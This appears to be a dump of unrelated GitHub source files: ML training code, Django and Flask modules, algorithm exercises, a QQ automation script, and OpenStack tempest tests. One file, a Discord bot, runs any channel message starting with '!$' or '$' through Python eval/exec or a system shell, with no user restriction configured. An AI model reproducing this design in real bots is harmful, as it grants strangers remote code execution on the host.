model_args.tuning_mode == 'prefixtune':\n for param in gpt2.base_model.parameters():\n param.requires_grad = False\n elif model_args.tuning_mode == 'bothtune':\n for param in gpt2.base_model.parameters():\n param.requires_grad = True\n\n #gpt2 = model\n\n print('loading the prefix model from ', model_args.prefixModel_name_or_path)\n # print(bool(\".ckpt\" in model_args.prefixModel_name_or_path))\n if model_args.optim_prefix == 'yes':\n optim_prefix_bool = True\n elif model_args.optim_prefix == 'no':\n optim_prefix_bool = False\n else:\n assert False, \"model_args.optim_prefix should be either yes or no\"\n\n if model_args.prefixModel_name_or_path is not None:\n config2 = AutoConfig.from_pretrained(model_args.prefixModel_name_or_path, cache_dir=model_args.cache_dir)\n # print(config2)\n\n if model_args.prefix_mode == 'embedding':\n model = PrefixEmbTuning.from_pretrained(\n model_args.prefixModel_name_or_path,\n from_tf=bool(\".ckpt\" in model_args.prefixModel_name_or_path),\n config=config2,\n cache_dir=model_args.cache_dir,\n model_gpt2=gpt2, optim_prefix=optim_prefix_bool, preseqlen=model_args.preseqlen,\n use_infix=(data_args.format_mode == 'infix')\n )\n\n elif model_args.prefix_mode == 'activation':\n\n model = PrefixTuning.from_pretrained(\n model_args.prefixModel_name_or_path,\n from_tf=bool(\".ckpt\" in model_args.prefixModel_name_or_path),\n config=config2,\n cache_dir=model_args.cache_dir,\n model_gpt2=gpt2, optim_prefix=optim_prefix_bool, preseqlen=model_args.preseqlen,\n use_infix=(data_args.format_mode == 'infix'),\n encoder_config=encoder_config\n )\n else:\n assert False, \"invalid prefix mode\"\n discri_labels = None\n else:\n\n # should clone the config and construct it.\n config_prefix = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)\n config_prefix._my_arg_tune_mode = model_args.tuning_mode\n config_prefix._my_arg_task_mode = data_args.task_mode\n config_prefix._my_arg_control = True\n config_prefix.train_weights = data_args.train_embs\n config_prefix.optim_prefix = optim_prefix_bool\n config_prefix.preseqlen = model_args.preseqlen\n config_prefix.use_infix = (data_args.format_mode == 'infix')\n config_prefix.format_mode = data_args.format_mode\n config_prefix.prefix_dropout = model_args.prefix_dropout\n config_prefix.vocab_size = len(tokenizer)\n config_prefix.lowdata = ('lowdata' in training_args.output_dir)\n if config_prefix.lowdata and data_args.use_lowdata_token == 'yes':\n config_prefix.lowdata_token = tokenizer([data_args.lowdata_token],\n add_prefix_space=True)['input_ids'] # return_tensors='np',\n print(data_args.lowdata_token)\n print(config_prefix.lowdata_token)\n\n # some extra stuff.\n config_prefix.init_random = model_args.init_random\n config_prefix.mid_dim = model_args.mid_dim\n\n config_prefix.encoder_embed = encoder_embed\n if data_args.task_mode == 'proto' or data_args.task_mode == 'proto_reg':\n config_prefix.n_support = n_support\n config_prefix.classes_per_it = classes_per_it\n print('training the prefix model from scratch. ')\n #if model_args.prefix_mode == 'embedding':\n\n # specific parametrization for embedding.\n # config_prefix.parametrize_emb = model_args.parametrize_emb\n # model = PrefixEmbTuning(config_prefix, model_gpt2=gpt2)\n\n #elif model_args.prefix_mode == 'activation':\n # model = PrefixTuning(config_prefix, model_gpt2=gpt2)\n #else:\n # assert False, \"invalid prefix mode\"\n print('Not in dataless setting, loading the control code. ')\n\n discri_labels = None\n\n # should clone the config and construct it.\n config_prefix = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)\n config_prefix._my_arg_tune_mode = model_args.tuning_mode\n config_prefix._my_arg_task_mode = data_args.task_mode\n config_prefix._my_arg_control = True\n config_prefix.train_weights = data_args.train_embs\n config_prefix.optim_prefix = optim_prefix_bool\n config_prefix.preseqlen = model_args.preseqlen\n config_prefix.use_infix = (data_args.format_mode == 'infix')\n config_prefix.format_mode = data_args.format_mode\n config_prefix.prefix_dropout = model_args.prefix_dropout\n config_prefix.vocab_size = len(tokenizer)\n config_prefix.lowdata = ('lowdata' in training_args.output_dir)\n if config_prefix.lowdata and data_args.use_lowdata_token == 'yes':\n config_prefix.lowdata_token = tokenizer([data_args.lowdata_token],\n add_prefix_space=True)['input_ids'] # return_tensors='np',\n print(data_args.lowdata_token)\n print(config_prefix.lowdata_token)\n\n # some extra stuff.\n config_prefix.init_random = model_args.init_random\n config_prefix.mid_dim = model_args.mid_dim\n config_prefix.encoder_embed = encoder_embed\n config_prefix.n_support = n_support\n config_prefix.classes_per_it = classes_per_it\n print('training the prefix model from scratch. ')\n if model_args.prefix_mode == 'embedding':\n config_prefix.parametrize_emb = model_args.parametrize_emb\n\n model = PrefixEmbTuning(config_prefix, model_gpt2=gpt2)\n\n elif model_args.prefix_mode == 'activation':\n model = PrefixTuning(config_prefix, model_gpt2=gpt2, encoder_config=encoder_config)\n\n else:\n assert False, \"invalid prefix mode\"\n\n #model.encoder_embed = encoder_embed\n train_dataset = (\n get_dataset(data_args, tokenizer=tokenizer,sentence_tokenizer=sentence_tokenizer, label_id_List = label_id_List,\n label_list = label_list,\n sentence_list = sentence_list, cache_dir=model_args.cache_dir, iterations = iterations, sample_per_class = sample_per_class, classes_per_it = classes_per_it, max_seq_length=max_length, data_type=data_type) if training_args.do_train else None\n )\n\n if data_args.task_mode == 'cl':\n data_collator = DataCollatorForCLModeling(\n tokenizer=tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability,\n format_mode=data_args.format_mode\n )\n elif data_args.task_mode in ['topic', 'no_rel', 'no_hidden', 'privacy', 'casual_lens']:\n data_collator = DataCollatorForTopicClusterLanguageModeling(tokenizer = tokenizer, sentence_tokenizer = sentence_tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability,\n format_mode=data_args.format_mode)\n elif data_args.task_mode == 'proto' or data_args.task_mode == 'proto_reg':\n data_collator = DataCollatorForProtoClusterLanguageModeling(tokenizer = tokenizer, sentence_tokenizer = sentence_tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability,\n format_mode=data_args.format_mode)\n\n # set prefix tuning extra parameters\n #model.proto_type_embed = proto_type_embed\n #model.task_mode = data_args.task_mode\n\n if (model_args.tuning_mode == 'prefixtune'):\n trainer = Trainer_Prefix(\n model=model,\n tokenizer=tokenizer,\n discri_labels=discri_labels,\n model_gpt2=gpt2,\n args=training_args,\n prediction_loss_only=True,\n train_dataset=train_dataset,\n eval_dataset=None,\n data_collator=data_collator,\n task_mode=data_args.task_mode,\n use_dropout=(model_args.use_dropout == 'yes'),\n alpha = alpha\n )\n elif (model_args.tuning_mode == 'bothtune'):\n print('BOTH TUNE for trainer prefix. ')\n trainer = Trainer_Prefix(\n model=model,\n tokenizer=tokenizer,\n discri_labels=discri_labels,\n model_gpt2=gpt2,\n args=training_args,\n prediction_loss_only=True,\n train_dataset=train_dataset,\n eval_dataset=None,\n data_collator=data_collator,\n task_mode=data_args.task_mode,\n use_dropout=(model_args.use_dropout == 'yes'),\n both_tune=True,\n alpha=alpha\n )\n\n # Training\n if training_args.do_train:\n model_path = (\n model_args.model_name_or_path\n if model_args.model_name_or_path is not None and os.path.isdir(model_args.model_name_or_path)\n else None\n )\n\n # For convenience, we also re-save the tokenizer to the same directory,\n # so that you can share your model easily on huggingface.co/models =)\n if trainer.is_world_master():\n tokenizer.save_pretrained(training_args.output_dir)\n\n if not (data_args.dataless == 'yes'):\n trainer.train(model_path=model_path)\n elif False:\n trainer.train_dataless(model_path=model_path, verbose=True)\n else:\n trainer.train_amortized_pplm(model_path=model_path, verbose=True)\n\n if 'lowdata' not in training_args.output_dir:\n trainer.save_model()\n\n if model_args.tuning_mode == 'bothtune':\n gpt2_dir = os.path.join(training_args.output_dir, 'gpt2')\n print(\"saving GPT2 model to\", gpt2_dir)\n print(gpt2)\n gpt2.save_pretrained(gpt2_dir)\n\n return model\n\n","repo_name":"zhuang-li/VAE-DPrior","sub_path":"PrefixTuning/transformers/examples/control/run_language_modeling_clean.py","file_name":"run_language_modeling_clean.py","file_ext":"py","file_size_in_byte":35785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16565951804","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dictionary', '0003_word_times_practiced'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='word',\n name='next_practice',\n field=models.DateTimeField(default='', auto_now=True),\n preserve_default=False,\n ),\n ]\n","repo_name":"burun/FinnDict-sqlite","sub_path":"dictionary/migrations/0004_word_next_practice.py","file_name":"0004_word_next_practice.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"43051150993","text":"import re, os, sys\nimport subprocess\nimport threading\nimport asyncio\nimport discord\nimport inspect\nimport textwrap\n\nfrom typing import NewType, Sequence, Tuple, Mapping, Dict, Pattern, Union, Callable, Optional\nfrom typing_extensions import Protocol as FnProtocol\nfrom types import FunctionType\nfrom functools import partial\n\nPatternVstr = Union[Pattern,str]\nUserIdentity = Union[Pattern,str,int]\nUserLevel = NewType('UserLevel',int) # Admin,Member = 0,n\nMsg = NewType('Msg',discord.Message)\n\nclass Fn_with_level(FnProtocol):\n def __call__(self,*groups:str,msg:Msg,level:Optional[UserLevel]=None)->Optional[str]: ...\nclass Fn_without_level(FnProtocol):\n def __call__(self,*groups:str,msg:Msg)->Optional[str]: ...\nExecFn = Union[Fn_with_level,Fn_without_level]\n\nclass Manager:\n \"\"\"To manage all commands with the author's permission level\n \"\"\"\n \n ContentFieldLimits = 2000\n \n def __init__(self,\n P2F:Mapping[PatternVstr,ExecFn]={\n re.compile(r'^! echo ([\\s\\S]*)$') : lambda *x,msg: 'Recived: '+x[0]\n },\n users:Optional[Dict[UserIdentity,UserLevel]]=None,\n ):\n \"\"\"To initialize and configure Manager\n Args:\n P2F = Pattern or Str to Function Map\n if Pattern matchs with message.content then Function is called with groups and msg=message\n if Str is equal to message.content then Function is called with msg=message\n in both then return string is the reply message. No reply if return value is None.\n users = Dict to get UserLevel for message.author or None\n if None then all Functions (P2F.values()) is callable by all users\n else for each Function UserLevel is checked and min level is got from Function.__kwdefaults__['level']\n \"\"\"\n \n self.P2F = P2F\n self.users = users\n \n async def on_message(self,message:Msg):\n \"\"\"It have to be called on each message (client.event)\n set it in client.event like `client.event(Manager().on_message)`\n And this to just match the command with its function.\n \"\"\"\n \n # Don't reply to bot's reply\n if message.author == client.user:\n return\n \n for cmd,Fn in self.P2F.items():\n if type(cmd) is str:\n if cmd == message.content:\n response = await self.execute(Fn=Fn,msg=message)\n if response and len(response) > self.ContentFieldLimits:\n for response in textwrap.wrap(response,self.ContentFieldLimits):\n await message.channel.send(response)\n elif response:\n await message.channel.send(response)\n else:\n match = cmd.match(message.content)\n if match:\n response = await self.execute(*match.groups(),Fn=Fn,msg=message)\n if response and len(response) > self.ContentFieldLimits:\n for response in textwrap.wrap(response,self.ContentFieldLimits):\n await message.channel.send(response)\n elif response:\n await message.channel.send(response)\n \n async def execute(self,*args:str,Fn:ExecFn,msg:Msg)->Optional[str]:\n \"\"\"To execute the matched function, if the user has requied privileges to execute.\n It gets the required level of each function from the function's kwargument 'level'.\n Then return which Fn(*args,msg=msg) returns.\n \"\"\"\n \n if Fn.__kwdefaults__ and 'level' in Fn.__kwdefaults__ and self.users != None:\n min_level = Fn.__kwdefaults__['level']\n for user,level in self.users.items():\n if type(user) is int:\n if msg.author.id == user: break\n elif type(user) is str:\n if msg.author.name == user: break\n else:\n if user.match(str(msg.author)): break\n else:\n if min_level != None:\n return ':( Not have requied permission level'\n else:\n level = None\n if inspect.iscoroutinefunction(Fn):\n return await Fn(*args,msg=msg,level=level)\n else:\n return Fn(*args,msg=msg,level=level)\n if inspect.iscoroutinefunction(Fn):\n return await Fn(*args,msg=msg)\n else:\n return Fn(*args,msg=msg)\n\nclass Matcher:\n \"\"\"To create P2F easily using decorator\n Examples:\n key = Matcher()\n @key(re.compile(r'^!\\$ ([\\s\\S]*)$'))\n def Eval(*args,msg):\n return repr(eval(args[0],globals(),globals()))\n @key('exit')\n def Exit(*args,msg):\n exit()\n client.event(Manager(key.P2F).on_message); client.run(Token)\n \"\"\"\n \n def __init__(self,P2F:Mapping[PatternVstr,ExecFn]=None):\n \"\"\"\n Args:\n P2F = dict if you want to continue with previous P2F\n or None to create new one\n \"\"\"\n \n self.P2F = P2F if P2F != None else dict()\n \n def __call__(self,match_with:PatternVstr)->Callable[[ExecFn],ExecFn]:\n \"\"\"For saving decorated function\n \"\"\"\n \n def updateP2F(Fn:ExecFn):\n self.P2F[match_with] = Fn\n return Fn\n return updateP2F\n\nif __name__ == \"__main__\":\n client = discord.Client()\n @client.event\n async def on_ready():\n print(f'{client.user.name} is Online :]')\n \n key = Matcher()\n ### Python shell\n @key(re.compile(r'^!\\$ ([\\s\\S]*)$'))\n def Exec(*args,msg):\n try:\n code = compile(args[0],'code','eval')\n global _\n _ = eval(code,globals(),globals())\n return repr(_)\n except SyntaxError:\n try:\n code = compile(args[0],'code','exec')\n exec(code,globals(),globals())\n return 'EXEC success'\n except:\n return repr(sys.exc_info())\n except:\n return repr(sys.exc_info())\n ### System shell\n processes = list()\n @key(re.compile(r'^\\$ ([\\s\\S]*)$'))\n async def Shell(*args,msg):\n process = subprocess.Popen(args[0], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)\n processes.append(process)\n response = list()\n threading.Thread(target=lambda p,r:r.extend(p.communicate()),args=(process,response)).start()\n while not response:\n await asyncio.sleep(.3)\n processes.remove(process)\n output, error = response[0].decode(), response[1].decode()\n outAerr = output.strip(os.linesep) + (os.linesep if error else '') + os.linesep.join([ '?>'+x for x in error.splitlines() ])\n return '$ '+args[0] + os.linesep + outAerr + os.linesep + f'Return code = {process.returncode}'\n ### To exit\n @key('!exit')\n def Exit(*args,msg):\n sys.exit(0)\n \n client.event(Manager(key.P2F).on_message)\n client.run(os.environ['DBToken'])\n","repo_name":"nkpro2000/test-HDbot","sub_path":"mybot.py","file_name":"mybot.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18771036137","text":"import win32gui\nimport win32con\nimport win32api\nimport time\n\nimport tools.reawin32 as rea\n\nIpClassName=\"TXGuiFoundation\"\n\n#QQ发消息\ndef qqwin_send(handle,str):\n print(\"开始发送消息。。。\")\n #设置剪贴板\n rea.setText(str)\n rea.mouse_click(handle,150,600)\n\n #黏贴剪贴板\n time.sleep(0.5)\n win32gui.SendMessage(handle, win32con.WM_PASTE, 0, 0) # 黏贴\n\n #@全体成员\n time.sleep(0.5)\n win32gui.SendMessage(handle,win32con.WM_KEYDOWN,win32con.VK_SHIFT,0)# 左 shift\n win32gui.SendMessage(handle, win32con.WM_CHAR,64, 0)# @\n win32gui.SendMessage(handle, win32con.WM_KEYUP, win32con.VK_SHIFT, 0)\n rea.key_enter(handle)\n\n time.sleep(0.5)\n rea.key_enter(handle)\n print(\"消息发送完成!\")\n\n#发布公告\ndef qq_announcement(handle,str):\n print(\"开始发布公告。。。\")\n # 点击公告\n rea.mouse_click(handle,96,80)\n time.sleep(2.5)\n\n # 点击发布公告按钮\n rea.mouse_click(handle, 666, 117)\n\n time.sleep(0.5)\n rea.setText(str)\n time.sleep(0.5)\n rea.mouse_click(handle, 340, 370)# 点击编辑框\n # ctrl+v\n time.sleep(0.5)\n win32api.keybd_event(0x11,0,0,0)\n win32api.keybd_event(0x56,0,0,0)\n win32api.keybd_event(0x56, 0, win32con.KEYEVENTF_KEYUP, 0)\n win32api.keybd_event(0x11, 0, win32con.KEYEVENTF_KEYUP, 0)\n\n time.sleep(0.5)\n rea.mouse_click(handle, 620, 500) # 点击发布\n print(\"公告发布完成!\")\n\n\ndef start_sending(qq_text,file_path,qq_q_name):\n print(\"开始QQ发布版本!!!!!!!!!!!!\")\n time.sleep(5)\n qqw = win32gui.FindWindow(IpClassName, qq_q_name) # 找到qq窗口\n\n if qqw != 0:\n\n win32gui.SetForegroundWindow(qqw) # 获得焦点\n left, top, right, bottom = win32gui.GetWindowRect(qqw)\n win32gui.SetWindowPos(qqw, None, left, top, 790, 650, win32con.SWP_SHOWWINDOW) # 调整窗口 坐标,大小\n\n qqwin_send(qqw, qq_text)\n\n time.sleep(1)\n rea.mouse_click(qqw, 124, 540)\n rea.send_file(file_path, \"打开\")\n\n time.sleep(1)\n qq_announcement(qqw, qq_text)\n time.sleep(3)\n print(\"QQ发布完成\")\n else:\n print(\"未找到窗口\")\n","repo_name":"smjzmmd/AutomationWork","sub_path":"tools/qqtools.py","file_name":"qqtools.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"72059477250","text":"from django import forms\nfrom django.contrib import admin\nfrom ckeditor_uploader.widgets import CKEditorUploadingWidget\n\nfrom .models import Pages\n\n\nclass ActionPublish(admin.ModelAdmin):\n \"\"\"Action для публикации и снятия с публикации\"\"\"\n\n def unpublish(self, request, queryset):\n \"\"\"Снять с публикации\"\"\"\n rows_updated = queryset.update(published=False)\n if rows_updated == 1:\n message_bit = \"1 story was\"\n else:\n message_bit = \"%s stories were\" % rows_updated\n self.message_user(request, \"%s successfully marked as published.\" % message_bit)\n\n unpublish.short_description = \"Снять с публикации\"\n unpublish.allowed_permissions = ('change',)\n\n def publish(self, request, queryset):\n \"\"\"Опубликовать\"\"\"\n rows_updated = queryset.update(published=True)\n if rows_updated == 1:\n message_bit = \"1 story was\"\n else:\n message_bit = \"%s stories were\" % rows_updated\n self.message_user(request, \"%s successfully marked as published.\" % message_bit)\n\n publish.short_description = \"Опубликовать\"\n publish.allowed_permissions = ('change',)\n\n\nclass PagesAdminForm(forms.ModelForm):\n \"\"\"Виджет редактора ckeditor\"\"\"\n text = forms.CharField(required=False, label=\"Контент страницы\", widget=CKEditorUploadingWidget())\n\n class Meta:\n model = Pages\n fields = '__all__'\n\n\n@admin.register(Pages)\nclass PagesAdmin(ActionPublish):\n \"\"\"Статичные страницы\"\"\"\n list_display = (\"title\", \"published\", \"id\")\n list_editable = (\"published\", )\n list_filter = (\"published\", \"template\")\n search_fields = (\"title\",)\n prepopulated_fields = {\"slug\": (\"title\", )}\n form = PagesAdminForm\n actions = ['unpublish', 'publish']\n save_on_top = True\n # readonly_fields = (\"slug\",)\n\n","repo_name":"DJWOMS/CourseDjango2","sub_path":"pages/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"41808774489","text":"from collections import Counter\nfrom get_subset_sum import subset_sum\n\n\ndef partition_into_equal_parts(l):\n '''Partitions s into two subsets of l that have the same sum.\n\n >>> problem = [15, 5, 20, 10, 35, 25, 10]\n >>> first, second = partition_into_equal_parts(problem)\n >>> valid_solution(first, second, problem)\n True\n '''\n total = sum(l)\n # If sum is odd, there is no way that total = sum(first) + sum(second) = 2 * sum(first)\n if total % 2:\n return\n first = subset_sum(total // 2, l)\n if first is None:\n return\n second = []\n # Fill second with items from counter\n second_counter = Counter(l) - Counter(first)\n for number, amount in second_counter.items():\n second.extend([number] * amount)\n return first, second\n\n\ndef valid_solution(first, second, problem):\n return sum(first) == sum(second) and Counter(first) + Counter(second) == Counter(problem)\n","repo_name":"redfast00/daily-algorithm-challenge","sub_path":"src/partition_set_into_equal_sum.py","file_name":"partition_set_into_equal_sum.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28701711835","text":"# (c) 2014 Digital Humanities Lab, Faculty of Humanities, Utrecht University\n# Author: Julian Gonggrijp, j.gonggrijp@uu.nl\n\nfrom datetime import datetime\nfrom random import SystemRandom\nimport os\nimport os.path as op\n\nfrom .common_fixtures import BaseFixture\nfrom ..database.models import *\nfrom reduced_testcase.server.security import generate_key\n\n\nclass TipsViewTestCase(BaseFixture):\n def setUp(self):\n super(TipsViewTestCase, self).setUp()\n age = datetime(1968, 4, 4, 6, 1)\n with self.request_context():\n db.session.add(Tip(title='some book', what='book', create=age, update=age))\n db.session.add(Tip(title='some website', create=age, update=age))\n db.session.commit()\n\n def test_bump(self):\n with self.client as c:\n token = generate_key(SystemRandom())\n with c.session_transaction() as s:\n s['token'] = token\n c.post('/admin/tip/action/',\n data={'action': 'Bump', 'rowid': '1', 't': token})\n\n with c.session_transaction(method=\"POST\", data={'t': token}) as s:\n self.assertIn(' tips have been bumped.', s['_flashes'][0][1])\n","repo_name":"jgonggrijp/session-testcase","sub_path":"reduced_testcase/tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71873108930","text":"\ndef solution(m, n, puddles):\n answer = 0\n arr = list([0] * (m+1) for _ in range(n+1))\n for x in range(1,n+1):\n for y in range(1,m+1):\n if x == 1 and y == 1:\n arr[x][y] = 1\n elif [y,x] not in puddles:\n arr[x][y] = arr[x-1][y] + arr[x][y-1]\n answer = arr[n][m] % 1000000007\n return answer\n\nsolution(4,3,[[2,2]])","repo_name":"youngmin940629/algorithm","sub_path":"python/2022_03/0310/프로그래머스_3-1.py","file_name":"프로그래머스_3-1.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17436667112","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nlayers = {\"CONV\": [0, 3, 7, 10, 14, 17],\n \"DENSE\": [21, 24, 27]}\n\nkeys = list(layers.keys())\n\nfor item in keys:\n fig, ax = plt.subplots()\n for index, layer_index in enumerate(layers[item]):\n experiment_name = \"Layer_{}\".format(layer_index)\n directory = os.path.join('../results', experiment_name)\n\n df = pd.read_csv(os.path.join(directory, 'results.csv'), sep='\\t')\n df['Accuracy'] = 100 * df['Accuracy']\n df.plot(x='Pruning_percentage', y='Accuracy', ax=ax, label=\"{}_{}\".format(item, index + 1))\n\n # Pruning Percentage where accuracy is higher than no pruning\n higher_acc = df['Accuracy'] > df['Accuracy'][0]\n\n print(\"{:5}{} - Pruning Percentage: {}% Test Accuracy: {:.2f}%\".format(item, index + 1, df['Accuracy'][higher_acc].idxmax(), df['Accuracy'][higher_acc].max()))\n\n ax.set_xticks(range(0, 105, 10))\n ax.set_yticks(range(0, 95, 10))\n ax.set_xlabel(\"Percentage of Neurons Pruned\")\n ax.set_ylabel(\"Accuracy on CIFAR-10 test set\")\n ax.set_title(\"Pruning Percentage for {} Layers\".format(item))\n ax.grid(linewidth=0.25)\n\n plt.savefig('../results/{}.pdf'.format(item))\n","repo_name":"tarujg/keras-deep-compression","sub_path":"parameter-pruning/utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"71276185090","text":"# 프로그래머스 - 디펜스 게임\n\nfrom heapq import heappush, heappop\n\ndef solution(n, k, enemy):\n if k >= len(enemy):\n return len(enemy)\n \n heap = []\n answer = 0\n for i in range(k):\n heappush(heap, enemy[i])\n answer += 1\n \n while n > 0 and answer < len(enemy):\n heappush(heap, enemy[answer])\n min_round = heappop(heap)\n if n >= min_round:\n answer += 1\n n -= min_round\n \n return answer\n\n\nif __name__ == \"__main__\":\n test_cases = [[7, 3, [4, 2, 4, 5, 3, 3, 1], 5],\n [2, 4, [3, 3, 3, 3], 4]]\n \n fail = False\n for test_case in test_cases:\n if solution(*test_case[:-1]) != test_case[-1]:\n print(\"FAIL\")\n fail = True\n break\n\n if not fail:\n print(\"SUCCESS\")","repo_name":"dbsxodud-11/programming_daily","sub_path":"Data_Structures/Priority_Queue/programmers_디펜스_게임.py","file_name":"programmers_디펜스_게임.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5663258032","text":"import numpy as np\n\n# x=np.sin(np.pi/2)\n#pi/180*degree_values\n# x=np.rad2deg(np.array([np.pi/2,np.pi/3,np.pi/4,np.pi/5,0]))\n# x=np.deg2rad(np.array([90,180,270,360]))\n# x=np.arcsin(1.0)\n# x=np.arcsin(np.array([1,-1,0.1]))\nbase=3\nperp=4\nx=np.hypot(base,perp)\nprint(x)\n","repo_name":"MetiKh2/NumPy-Tutorial","sub_path":"Ufunc_trigonometric.py","file_name":"Ufunc_trigonometric.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71805679171","text":"import numpy as np\n\nimport pyximport\npyximport.install(setup_args={'include_dirs': np.get_include()})\n\nfrom hippocampus.fastBVC import Boundary\nfrom hippocampus.geometry_utils import intersect_lines, subtended_angle_c, in_smallest_interval\n\n\nclass BVC(object):\n \"\"\"Boundary Vector Cell. Parameters taken from Burgess et al.\n \"\"\"\n\n def __init__(self, pref_distance=None, pref_orientation=None):\n self.beta = 1830\n self.sigma_0 = 122\n self.sigma_ang = 0.2\n if pref_distance is None:\n self.pref_distance = np.random.choice([81.0, 169.0, 265.0, 369.0, 482.5, 606.5])\n else:\n self.pref_distance = pref_distance\n if pref_orientation is None:\n self.pref_orientation = np.radians(np.random.choice(np.linspace(0,354, 60)))\n else:\n self.pref_orientation = pref_orientation\n self.sigma_rad = (self.pref_distance / self.beta + 1) * self.sigma_0\n\n def distance_to_nearest_boundary_py(self, pos, direction, env):\n d = [np.inf]\n subtended_angle = []\n for b in env.boundaries:\n v1 = b.p1 - pos\n v2 = b.p2 - pos\n a1 = np.arctan2(v1[1], v1[0]) % (2 * np.pi)\n a2 = np.arctan2(v2[1], v2[0]) % (2 * np.pi)\n\n if in_smallest_interval(direction, a1, a2):\n d.append(b.distance_in_orientation(pos, direction))\n subtended_angle.append(b.subtended_angle(np.array(pos, dtype=np.float64)))\n return min(d), subtended_angle[d.index(min(d)) - 1]\n\n def distance_to_nearest_boundary(self, pos, orientation, env):\n idx = self.which_boundary(pos, orientation, env)\n b = env.boundaries[idx]\n d = b.distance_in_orientation(pos, orientation)\n a = b.subtended_angle(pos)\n return d, a\n\n def which_boundary(self, pos, orientation, env):\n for i in range(env.n_boundaries):\n b = env.boundaries[i]\n v1 = b.p1 - pos\n v2 = b.p2 - pos\n a1 = np.arctan2(v1[1], v1[0]) % (2 * np.pi)\n a2 = np.arctan2(v2[1], v2[0]) % (2 * np.pi)\n if in_smallest_interval(orientation, a1, a2):\n return i\n return False\n\n def compute_activation_pixel(self, pos, env):\n angles = np.linspace(0, 2 * np.pi, 400)[:-1]\n n_angles = len(angles)\n ds = np.empty(len(angles), dtype=np.float64)\n\n for i in range(n_angles):\n theta = angles[i]\n\n # get distance and subtended angle\n d, subtended_angle = self.distance_to_nearest_boundary(pos, theta, env)\n f = self.calculate_activation(d, subtended_angle, theta)\n ds[i] = f\n return ds.sum()\n\n def compute_ratemap_grid(self, xs, ys, env):\n nx = len(xs)\n ny = len(ys)\n rate_map = np.zeros(nx, dtype=np.float64)\n\n for i, j in zip(range(nx), range(ny)):\n pos = np.array([xs[i], ys[j]], dtype=np.float64)\n activation = self.compute_activation_pixel(pos, env)\n rate_map[i] = activation\n return rate_map\n\n def calculate_activation(self, d, subtended_angle, theta):\n # calculate activation\n distance_term = np.exp(-(d - self.pref_distance) ** 2 / (2 * self.sigma_rad ** 2)) / np.sqrt(\n 2 * np.pi * self.sigma_rad ** 2)\n angle_term = np.exp(-(theta - self.pref_orientation) ** 2 / (2 * self.sigma_ang ** 2)) / np.sqrt(\n 2 * np.pi * self.sigma_ang ** 2)\n f = distance_term * angle_term * subtended_angle\n return f\n\n","repo_name":"bicanski/HBPcollab","sub_path":"Striatal_v_hippocampal_nav_v3/hippocampus/slowBVC.py","file_name":"slowBVC.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"14883397151","text":"import logging\n\nfrom six import moves\nfrom testtools import matchers\n\nfrom tempest.api.messaging import base\nfrom tempest.common.utils import data_utils\nfrom tempest import test\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass TestQueues(base.BaseMessagingTest):\n\n @test.attr(type='smoke')\n def test_create_queue(self):\n # Create Queue\n queue_name = data_utils.rand_name('test-')\n _, body = self.create_queue(queue_name)\n\n self.addCleanup(self.client.delete_queue, queue_name)\n\n self.assertEqual('', body)\n\n\nclass TestManageQueue(base.BaseMessagingTest):\n _interface = 'json'\n\n @classmethod\n def resource_setup(cls):\n super(TestManageQueue, cls).resource_setup()\n cls.queues = list()\n for _ in moves.xrange(5):\n queue_name = data_utils.rand_name('Queues-Test')\n cls.queues.append(queue_name)\n # Create Queue\n cls.client.create_queue(queue_name)\n\n @test.attr(type='smoke')\n def test_delete_queue(self):\n # Delete Queue\n queue_name = self.queues.pop()\n _, body = self.delete_queue(queue_name)\n self.assertEqual('', body)\n\n @test.attr(type='smoke')\n def test_check_queue_existence(self):\n # Checking Queue Existence\n for queue_name in self.queues:\n _, body = self.check_queue_exists(queue_name)\n self.assertEqual('', body)\n\n @test.attr(type='smoke')\n def test_check_queue_head(self):\n # Checking Queue Existence by calling HEAD\n for queue_name in self.queues:\n _, body = self.check_queue_exists_head(queue_name)\n self.assertEqual('', body)\n\n @test.attr(type='smoke')\n def test_list_queues(self):\n # Listing queues\n _, body = self.list_queues()\n self.assertEqual(len(body['queues']), len(self.queues))\n for item in body['queues']:\n self.assertIn(item['name'], 